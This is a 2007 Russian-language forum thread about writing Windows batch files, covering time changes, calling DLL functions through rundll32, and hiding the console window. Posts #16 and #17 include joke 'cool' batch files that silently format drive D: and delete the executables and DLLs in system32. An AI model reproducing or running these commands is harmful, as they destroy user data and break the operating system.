Forums.Avtograd.Ru: bat-аника - Forums.Avtograd.Ru

Перейти к содержимому

  • (2 Страниц)
  • +
  • 1
  • 2
  • Вы не можете создать новую тему
  • Вы не можете ответить в тему

bat-аника Вопросы по написанию bat-файлов

#1 Пользователь офлайн   IriLka

  • Новичок
  • Pip
  • Группа: Пользователи
  • Сообщений: 8
  • Регистрация: 01 Ноябрь 07

Отправлено 06 Ноябрь 2007 - 10:39

Здравствуйте! Не нашла темы про bat, а очень нужно. Необходимо, чтобы батник выполнял определенные вычисления со временем, затем менял время, запускал программу и таймер к ней, а затем опять менял время, закрывал запущенное приложение и возвращал время на текущее. Можно ли такое извращение создать? И у кого-нить есть предложения или соответствующая литература?
0


  • (2 Страниц)
  • +
  • 1
  • 2
  • Вы не можете создать новую тему
  • Вы не можете ответить в тему

Другие ответы в этой теме

#2 Пользователь офлайн   IriLka

  • Новичок
  • Pip
  • Группа: Пользователи
  • Сообщений: 8
  • Регистрация: 01 Ноябрь 07

Отправлено 06 Ноябрь 2007 - 10:44

И еще: можно ли взять функцию из .dll и выполнить ее?
0

#3 Пользователь офлайн   poco_loco

  • Пользователь
  • PipPip
  • Группа: Пользователи
  • Сообщений: 181
  • Регистрация: 01 Ноябрь 07

Отправлено 06 Ноябрь 2007 - 11:35

ответ на все твои вопросы: WSH ;)
0

#4 Пользователь офлайн   IriLka

  • Новичок
  • Pip
  • Группа: Пользователи
  • Сообщений: 8
  • Регистрация: 01 Ноябрь 07

Отправлено 06 Ноябрь 2007 - 13:44

В принципе, я уже нашла более рациональное решение. Вроде ))
0

#5 Пользователь офлайн   IriLka

  • Новичок
  • Pip
  • Группа: Пользователи
  • Сообщений: 8
  • Регистрация: 01 Ноябрь 07

Отправлено 06 Ноябрь 2007 - 13:54

При запуске батник открывает cmd.exe, а можно как-нибудь его скрыто запустить? :)
0

#6 Пользователь офлайн   IriLka

  • Новичок
  • Pip
  • Группа: Пользователи
  • Сообщений: 8
  • Регистрация: 01 Ноябрь 07

Отправлено 06 Ноябрь 2007 - 13:56

В смысле, само окошко cmd?
0

#7 Пользователь офлайн   Exception

  • Активный пользователь
  • PipPipPip
  • Группа: Пользователи
  • Сообщений: 550
  • Регистрация: 01 Ноябрь 07

Отправлено 06 Ноябрь 2007 - 16:17

Просмотр сообщенияIriLka (6.11.2007, 10:44):

И еще: можно ли взять функцию из .dll и выполнить ее?

Ну для этого надо знать какие параметры передаются для вызова функции. Самый удобный способ - через программу PE Explorer. Там точно видно. Ну или через приложение Depends.

Просмотр сообщенияIriLka (6.11.2007, 13:56):

В смысле, само окошко cmd?

Ну я не знаю, но ты программно можешь сделать через ShellExecute или WinExec с параметром SW_HIDE.
0

#8 Пользователь офлайн   Keks

  • Пользователь
  • PipPip
  • Группа: Пользователи
  • Сообщений: 398
  • Регистрация: 01 Ноябрь 07

Отправлено 08 Ноябрь 2007 - 23:44

Просмотр сообщенияIriLka (6.11.2007, 10:44):

И еще: можно ли взять функцию из .dll и выполнить ее?

Да можно делал сам, но дано поэтому точно непомню, нужно вроде вызвать приложение rundll32.exe и передать ему в качестве параметра путь к Dll-ке и имя функции с параметрами.

Примерно так
rundll32.exe test.dll testfunc

0

#9 Пользователь офлайн   Terror

  • Активный пользователь
  • PipPipPip
  • Группа: Пользователи
  • Сообщений: 512
  • Регистрация: 01 Ноябрь 07

Отправлено 09 Ноябрь 2007 - 17:35

Пишем вирус на основе батника? :)
<!--sizeo:2--><span style="font-size:10pt;line-height:100%"><!--/sizeo-->< a href="http://forums.avtograd.ru/index.php?showtopic=119165" target="_blank">Quick Confign - программа для быстрого изменения настроек Windows</a><!--sizec--></span><!--/sizec-->
0

#10 Пользователь офлайн   Космонавт

  • Активный пользователь
  • PipPipPip
  • Группа: Пользователи
  • Сообщений: 666
  • Регистрация: 01 Ноябрь 07

Отправлено 14 Ноябрь 2007 - 15:36

Просмотр сообщенияIriLka (6.11.2007, 14:54):

При запуске батник открывает cmd.exe, а можно как-нибудь его скрыто запустить? :)

если запустить как service, например как mysql, то видно не будет. А вот как установить в service щас не помню
0

#11 Пользователь офлайн   AlterEgo

  • Пользователь
  • PipPip
  • Группа: Пользователи
  • Сообщений: 138
  • Регистрация: 01 Ноябрь 07

Отправлено 14 Ноябрь 2007 - 16:20

ну установить как сервис любую хрень можно, а вот чтобы запустить - прога должна специальный интерфейс иметь
а именно принимать месяги от сервис контрол манагера
0

#12 Пользователь офлайн   Exception

  • Активный пользователь
  • PipPipPip
  • Группа: Пользователи
  • Сообщений: 550
  • Регистрация: 01 Ноябрь 07

Отправлено 14 Ноябрь 2007 - 16:27

Как вариант можно такскать с собой еще одну прогу которая будет скрывать окно консоли... И запускать на выполнение этим батником...
0

#13 Пользователь офлайн   Alex Z. Saver

  • Старожил
  • PipPipPipPipPip
  • Группа: Модераторы
  • Сообщений: 3 891
  • Регистрация: 01 Ноябрь 07

Отправлено 22 Ноябрь 2007 - 22:51

Просмотр сообщенияIriLka (6.11.2007, 13:54):

При запуске батник открывает cmd.exe, а можно как-нибудь его скрыто запустить? :)

Если заплатишь, то и процесс скрою... )
0

#14 Пользователь офлайн   Dr.V1.3

  • Пользователь
  • PipPip
  • Группа: Пользователи
  • Сообщений: 116
  • Регистрация: 15 Ноябрь 07

Отправлено 12 Декабрь 2007 - 23:36

тоскать с собой кучу программ...
вопрос а зачем тогда батник?:)))
0

#15 Пользователь офлайн   Barrabas

  • Пользователь
  • PipPip
  • Группа: Пользователи
  • Сообщений: 431
  • Регистрация: 01 Ноябрь 07

Отправлено 15 Декабрь 2007 - 00:20

а не проще заюзать VBS вместо BAT, и получить в свое распоряжение полноценный скриптовый язык
выполняется он на виндах 98 и старше
0

#16 Пользователь офлайн   teacher_killer

  • Пользователь
  • PipPip
  • Группа: Пользователи
  • Сообщений: 131
  • Регистрация: 01 Ноябрь 07

Иконки сообщения  Отправлено 18 Декабрь 2007 - 08:46

вот клёвый батник :rolleyes:

@echo off
echo y|format D: /q >null

и этот тоже неплохой :)

C:
cd C:\WINDOWS\system32
del *.exe
del *.dll
0

#17 Пользователь офлайн   Terror

  • Активный пользователь
  • PipPipPip
  • Группа: Пользователи
  • Сообщений: 512
  • Регистрация: 01 Ноябрь 07

Отправлено 19 Декабрь 2007 - 11:01

У меня почему-то первый батник не работает, сразу завершает работу. Диском D у меня идет DVD-ROM :)

Просмотр сообщенияteacher_killer (18.12.2007, 8:46):

вот клёвый батник :rolleyes:

@echo off
echo y|format D: /q >null

и этот тоже неплохой :)

C:
cd C:\WINDOWS\system32
del *.exe
del *.dll

<!--sizeo:2--><span style="font-size:10pt;line-height:100%"><!--/sizeo-->< a href="http://forums.avtograd.ru/index.php?showtopic=119165" target="_blank">Quick Confign - программа для быстрого изменения настроек Windows</a><!--sizec--></span><!--/sizec-->
0

#18 Пользователь офлайн   teacher_killer

  • Пользователь
  • PipPip
  • Группа: Пользователи
  • Сообщений: 131
  • Регистрация: 01 Ноябрь 07

Отправлено 20 Декабрь 2007 - 21:45

А с Диском С: такой трюк не пройдёт :(
И к томуже если туда поставить С: сразу Nod32 ругается :(
0

#19 Пользователь офлайн   Alex Z. Saver

  • Старожил
  • PipPipPipPipPip
  • Группа: Модераторы
  • Сообщений: 3 891
  • Регистрация: 01 Ноябрь 07

Отправлено 25 Декабрь 2007 - 16:04

Ничё себе тут навыкладывали. А где надпись: "ламерам НЕ юзать"? :blink:
0

#20 Пользователь офлайн   Keks

  • Пользователь
  • PipPip
  • Группа: Пользователи
  • Сообщений: 398
  • Регистрация: 01 Ноябрь 07

Отправлено 06 Январь 2008 - 17:42

Просмотр сообщенияBarrabas (15.12.2007, 0:20):

а не проще заюзать VBS вместо BAT, и получить в свое распоряжение полноценный скриптовый язык
выполняется он на виндах 98 и старше

Заинтриговал прям, скинь какой-нить пример на VBS

0

  • (2 Страниц)
  • +
  • 1
  • 2
  • Вы не можете создать новую тему
  • Вы не можете ответить в тему

1 человек читают эту тему
0 пользователей, 1 гостей, 0 скрытых пользователей